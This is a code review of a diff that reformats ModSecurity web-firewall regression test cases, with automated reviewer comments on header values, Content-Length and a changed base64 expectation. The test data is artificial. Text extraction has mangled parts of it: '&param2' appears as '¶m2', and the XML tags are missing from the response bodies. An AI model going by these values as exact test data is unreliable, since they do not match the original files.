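Review bot: The response `Content-Type` value keeps its trailing `\n\r` while the same hunk replaces the placeholder `Content-Length` of `length\n\r` with `384`, so one header is normalised and the other still embeds line-break characters (in LF-CR order) inside a header value. Unless these cases are meant to feed control characters in a header to the engine, which neither title suggests, write `"Content-Type": "text/xml; charset=utf-8",` in both. The literal `384` must now be kept in step with the `body` array by hand; the harness change in this commit adds an `UPDATE_CONTENT_LENGTH` environment switch that presumably regenerates it, and the commit description should say how. The same `Content-Type` value recurs in the actions.json hunks and, as `plain/text\n\r`, in the auditlog.json hunks.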
@@ -1,88 +1,92 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing Transformatio :: base64 (1/2)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "Testing Transformatio :: base64 (1/2)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "param1=value1¶m2=value2" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "debug_log": "t:base64encode: \"dmFsdWUyCg==\"" + "expected": { + "debug_log": "t:base64encode: \"dmFsdWUy\"", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule ARGS \"@rx .\" \"id:1,phase:2,t:base64encode,pass,t:trim\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing Transformatio :: base64 (2/2)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "Testing Transformatio :: base64 (2/2)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length": "27", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "29", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "param1=dmFsdWUy¶m2=value2" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log": "t:base64decode: \"value2\"" + "expected": { + "debug_log": "t:base64decode: \"value2\"", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule ARGS \"@rx .\" \"id:1,phase:2,t:base64decode,pass,t:trim\"" ] diff --git a/test/test-cases/regression/action-xmlns.json b/test/test-cases/regression/action-xmlns.json index df612f20c3..1d7d5acb09 100644 --- a/test/test-cases/regression/action-xmlns.json +++ b/test/test-cases/regression/action-xmlns.json 
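Review bot: The expected value in case (1/2) changes from `dmFsdWUyCg==` to `dmFsdWUy`, which alters asserted behaviour inside an otherwise mechanical reformat: the old string is the Base64 of `value2` followed by a line feed, the new one of `value2` alone. That suggests the harness used to append a newline to each body line and no longer does (inferred, since the body-joining code is not in this hunk). The commit description should state this so the changed expectation is not mistaken for a regression being hidden. While the titles are being rewritten, `Transformatio` could be corrected in both cases, e.g. `"title": "Testing Transformation :: base64 (1/2)",`.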
@@ -1,108 +1,196 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing action :: XMLNS (parser error 1)", - "expected":{ + "enabled": 1, + "version_min": 300000, + "title": "Testing action :: XMLNS (parser error 1)", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Content-Length": "0" + }, + "uri": "", + "method": "", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 200, "parser_error": "XMLS: Bad format, missing equals sign" }, - "rules":[ + "rules": [ "SecRule REQUEST_HEADERS:Content-Type \"^text/xml$\" \"id:500008,phase:1,t:none,t:lowercase,nolog,pass,ctl:requestBodyProcessor=XML\"", "SecRule REQUEST_HEADERS:User-Agent \"^(.*)$\" \"id:123,xmlns:soap'http://schemas.xmlsoap.org/soap/envelope/'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing action :: XMLNS (parser error 2)", - "expected":{ + "enabled": 1, + "version_min": 300000, + "title": "Testing action :: XMLNS (parser error 2)", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Content-Length": "0" + }, + "uri": "", + "method": "", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 200, "parser_error": "XMLS: XMLNS is invalid. Expecting a name=value format." 
}, - "rules":[ + "rules": [ "SecRule REQUEST_HEADERS:Content-Type \"^text/xml$\" \"id:500008,phase:1,t:none,t:lowercase,nolog,pass,ctl:requestBodyProcessor=XML\"", "SecRule REQUEST_HEADERS:User-Agent \"^(.*)$\" \"id:123,xmlns:=\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing action :: XMLNS (parser error 3)", - "expected":{ + "enabled": 1, + "version_min": 300000, + "title": "Testing action :: XMLNS (parser error 3)", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Content-Length": "0" + }, + "uri": "", + "method": "", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 200, "parser_error": "XMLS: Missing xmlns href for prefix: `schemas.xmlsoap.org/soap/envelope/'." }, - "rules":[ + "rules": [ "SecRule REQUEST_HEADERS:Content-Type \"^text/xml$\" \"id:500008,phase:1,t:none,t:lowercase,nolog,pass,ctl:requestBodyProcessor=XML\"", "SecRule REQUEST_HEADERS:User-Agent \"^(.*)$\" \"id:123,xmlns:soap='schemas.xmlsoap.org/soap/envelope/'\"" ] }, - { - "enabled":1, - "version_min":300000, - "resource":"libxml2", - "title":"Testing XML request body parser (validate ok)", - "expected":{ - "debug_log": "Target value: \"39.95\" \\(Variable: XML:\/bookstore\/book\/price\\[text\\(\\)\\]\\)" - }, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + { + "enabled": 1, + "version_min": 300000, + "title": "Testing XML request body parser (validate ok)", + "resource": "libxml2", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Content-Type": "text/xml" + "Content-Type": "text/xml", + 
"Content-Length": "732" }, - "uri":"/?key=value&key=other_value", - "method":"POST", + "uri": "/?key=value&key=other_value", + "method": "POST", "body": [ "", "", "", - "Everyday Italian", - "Giada De Laurentiis", - "2005", - "30.00", + "Everyday Italian", + "Giada De Laurentiis", + "2005", + "30.00", "", - "", - "Harry Potter", - "J K. Rowling", - "2005", - "29.99", + "Harry Potter", + "J K. Rowling", + "2005", + "29.99", "", - "", - "XQuery Kick Start", - "James McGovern", - "Per Bothner", - "Kurt Cagle", - "James Linn", - "Vaidyanathan Nagarajan", - "2003", - "49.99", + "XQuery Kick Start", + "James McGovern", + "Per Bothner", + "Kurt Cagle", + "James Linn", + "Vaidyanathan Nagarajan", + "2003", + "49.99", "", - "", - "Learning XML", - "Erik T. Ray", - "2003", - "39.95", + "Learning XML", + "Erik T. Ray", + "2003", + "39.95", "", "" ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "Target value: \"39.95\" \\(Variable: XML:/bookstore/book/price\\[text\\(\\)\\]\\)", + "http_code": 200 }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecRule REQUEST_HEADERS:Content-Type \"^text/xml$\" \"id:500005,phase:1,t:none,t:lowercase,nolog,pass,ctl:requestBodyProcessor=XML\"", - "SecRule XML:/bookstore/book/price[text()] \"Fred\" \"phase:3,id:123,xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'\"" + "rules": [ + "SecRuleEngine On", + "SecRequestBodyAccess On", + "SecRule REQUEST_HEADERS:Content-Type \"^text/xml$\" \"id:500005,phase:1,t:none,t:lowercase,nolog,pass,ctl:requestBodyProcessor=XML\"", + "SecRule XML:/bookstore/book/price[text()] \"Fred\" \"phase:3,id:123,xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'\"" ] } ] diff --git a/test/test-cases/regression/actions.json b/test/test-cases/regression/actions.json index c69f1a7cb0..c07a54e1c5 100644 --- a/test/test-cases/regression/actions.json 
+++ b/test/test-cases/regression/actions.json @@ -15,8 +15,8 @@ "request": { "headers": { "Host": "net.tutsplus.com", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -24,33 +24,34 @@ "Connection": "keep-alive", "Cookie": "PHPSESSID=r2t5uvjq435r4q7ib3vtdjq120", "Pragma": "no-cache", - "Cache-Control": "no-cache" + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri": "\/test.pl?param1= test ¶m2=test2", + "uri": "/test.pl?param1= test ¶m2=test2", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", - "Content-Length": "length\n\r" + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "384" }, "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, "expected": { - "audit_log": "", "debug_log": "\\[9\\] T \\(0\\) t:trim: \"test", - "error_log": "", "http_code": 403 }, "rules": [ @@ -59,7 +60,7 @@ "SecRule ARGS \"@contains test\" \"id:1,t:trim,deny\"" ] }, - { + { "enabled": 1, "version_min": 300000, "version_max": 0, 
@@ -75,8 +76,8 @@ "request": { "headers": { "Host": "net.tutsplus.com", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -84,33 +85,34 @@ "Connection": "keep-alive", "Cookie": "PHPSESSID=r2t5uvjq435r4q7ib3vtdjq120", "Pragma": "no-cache", - "Cache-Control": "no-cache" + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri": "\/test.pl?param1= test ¶m2=test2", + "uri": "/test.pl?param1= test ¶m2=test2", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", - "Content-Length": "length\n\r" + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "384" }, "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, "expected": { - "audit_log": "", "debug_log": "\\[9\\] T \\(0\\) t:trim: \"test", - "error_log": "", "http_code": 302, "redirect_url": "http://www.google.com" }, @@ -119,7 +121,7 @@ "SecRule ARGS \"@contains test\" \"id:1,t:trim,redirect:'http://www.google.com'\"" ] }, - { + { "enabled": 1, "version_min": 300000, "version_max": 0, 
@@ -135,8 +137,8 @@ "request": { "headers": { "Host": "net.tutsplus.com", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -144,33 +146,34 @@ "Connection": "keep-alive", "Cookie": "PHPSESSID=r2t5uvjq435r4q7ib3vtdjq120", "Pragma": "no-cache", - "Cache-Control": "no-cache" + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri": "\/test.pl?param1= test ¶m2=test2", + "uri": "/test.pl?param1= test ¶m2=test2", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", - "Content-Length": "length\n\r" + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "384" }, "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, "expected": { - "audit_log": "", "debug_log": "\\[9\\] T \\(0\\) t:trim: \"test", - "error_log": "", "http_code": 306, "redirect_url": "http://www.google.com" }, @@ -179,7 +182,7 @@ "SecRule ARGS \"@contains test\" \"id:1,t:trim,status:306,redirect:'http://www.google.com'\"" ] }, - { + { "enabled": 1, "version_min": 300000, "version_max": 0, 
@@ -195,8 +198,8 @@ "request": { "headers": { "Host": "net.tutsplus.com", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -204,33 +207,34 @@ "Connection": "keep-alive", "Cookie": "PHPSESSID=r2t5uvjq435r4q7ib3vtdjq120", "Pragma": "no-cache", - "Cache-Control": "no-cache" + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri": "\/test.pl?param1= test ¶m2=test2", + "uri": "/test.pl?param1= test ¶m2=test2", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", - "Content-Length": "length\n\r" + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "384" }, "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, "expected": { - "audit_log": "", "debug_log": "\\[9\\] T \\(0\\) t:trim: \"test", - "error_log": "", "http_code": 500 }, "rules": [ @@ -238,7 +242,7 @@ "SecRule ARGS \"@contains test\" \"id:1,t:trim,deny,status:500\"" ] }, - { + { "enabled": 1, "version_min": 300000, "version_max": 0, 
@@ -254,8 +258,8 @@ "request": { "headers": { "Host": "net.tutsplus.com", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -263,33 +267,34 @@ "Connection": "keep-alive", "Cookie": "PHPSESSID=r2t5uvjq435r4q7ib3vtdjq120", "Pragma": "no-cache", - "Cache-Control": "no-cache" + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri": "\/test.pl?param1= test ¶m2=test2", + "uri": "/test.pl?param1= test ¶m2=test2", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", - "Content-Length": "length\n\r" + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "384" }, "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, "expected": { - "audit_log": "", "debug_log": "\\[9\\] T \\(0\\) t:trim: \"test", - "error_log": "", "http_code": 500 }, "rules": [ 
@@ -313,8 +318,8 @@ "request": { "headers": { "Host": "net.tutsplus.com", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -322,33 +327,34 @@ "Connection": "keep-alive", "Cookie": "PHPSESSID=r2t5uvjq435r4q7ib3vtdjq120", "Pragma": "no-cache", - "Cache-Control": "no-cache" + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri": "\/test.pl?param1= test ¶m2=test2", + "uri": "/test.pl?param1= test ¶m2=test2", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", - "Content-Length": "length\n\r" + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "384" }, "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, "expected": { - "audit_log": "", "debug_log": "\\[9\\] T \\(0\\) t:trim: \"test", - "error_log": "", "http_code": 500 }, "rules": [ diff --git a/test/test-cases/regression/auditlog.json b/test/test-cases/regression/auditlog.json index 417f9950e4..879b1aac64 100644 --- a/test/test-cases/regression/auditlog.json +++ b/test/test-cases/regression/auditlog.json 
@@ -15,33 +15,35 @@ "request": { "headers": { "Host": "www.modsecurity.org", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", "Keep-Alive": "300", "Connection": "keep-alive", "Pragma": "no-cache", - "Cache-Control": "no-cache" + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri": "\/test.pl?param1= test ¶m2=test2", + "uri": "/test.pl?param1= test ¶m2=test2", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "plain\/text\n\r" + "Content-Type": "plain/text\n\r", + "Content-Length": "4" }, "body": [ "test" ] }, "expected": { - "audit_log": "", "debug_log": "\\[9\\] T \\(0\\) t:trim: \"test", - "error_log": "", "http_code": 403 }, "rules": [ 
@@ -72,33 +74,35 @@ "request": { "headers": { "Host": "www.modsecurity.org", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", "Keep-Alive": "300", "Connection": "keep-alive", "Pragma": "no-cache", - "Cache-Control": "no-cache" + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri": "\/test.pl?param1= test ¶m2=test2", + "uri": "/test.pl?param1= test ¶m2=test2", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "plain\/text\n\r" + "Content-Type": "plain/text\n\r", + "Content-Length": "4" }, "body": [ "test" ] }, "expected": { - "audit_log": "", "debug_log": "\\[9\\] T \\(0\\) t:trim: \"test", - "error_log": "", "http_code": 403 }, "rules": [ 
@@ -130,33 +134,35 @@ "request": { "headers": { "Host": "www.modsecurity.org", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", "Keep-Alive": "300", "Connection": "keep-alive", "Pragma": "no-cache", - "Cache-Control": "no-cache" + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri": "\/test.pl?param1= test ¶m2=test2", + "uri": "/test.pl?param1= test ¶m2=test2", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "plain\/text\n\r" + "Content-Type": "plain/text\n\r", + "Content-Length": "4" }, "body": [ "test" ] }, "expected": { - "audit_log": "", "debug_log": "\\[9\\] T \\(0\\) t:trim: \"test", - "error_log": "", "http_code": 403 }, "rules": [ 
@@ -188,24 +194,28 @@ "request": { "headers": { "Host": "www.modsecurity.org", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", "Keep-Alive": "300", "Connection": "keep-alive", "Pragma": "no-cache", - "Cache-Control": "no-cache" + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri": "\/test.pl?param1= test ¶m2=test2", + "uri": "/test.pl?param1= test ¶m2=test2", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "plain\/text\n\r" + "Content-Type": "plain/text\n\r", + "Content-Length": "4" }, "body": [ "test" @@ -213,8 +223,6 @@ }, "expected": { "audit_log": "{\"transaction\":{\"client_ip\":\"200.249.12.31\",\"time_stamp\":\"\\S{3} \\S{3} [ \\d]\\d \\d{2}:\\d{2}:\\d{2} \\d{4}\"", - "debug_log": "", - "error_log": "", "http_code": 403 }, "rules": [ 
@@ -247,24 +255,34 @@ "request": { "headers": { "Host": "www.modsecurity.org", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", "Keep-Alive": "300", "Connection": "keep-alive", "Pragma": "no-cache", - "Cache-Control": "no-cache" + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri": "\/test.pl?param1=test¶m2=test2", + "uri": "/test.pl?param1=test¶m2=test2", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] }, "expected": { "audit_log": "id \"1556", - "error_log": "", "http_code": 403 }, "rules": [ 
@@ -296,24 +314,34 @@ "request": { "headers": { "Host": "www.modsecurity.org", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", "Keep-Alive": "300", "Connection": "keep-alive", "Pragma": "no-cache", - "Cache-Control": "no-cache" + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri": "\/test.pl?param1=test¶m2=tEst2", + "uri": "/test.pl?param1=test¶m2=tEst2", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] }, "expected": { "audit_log": "\\[msg \"testmsg\"\\] \\[data \"testdata\"\\] 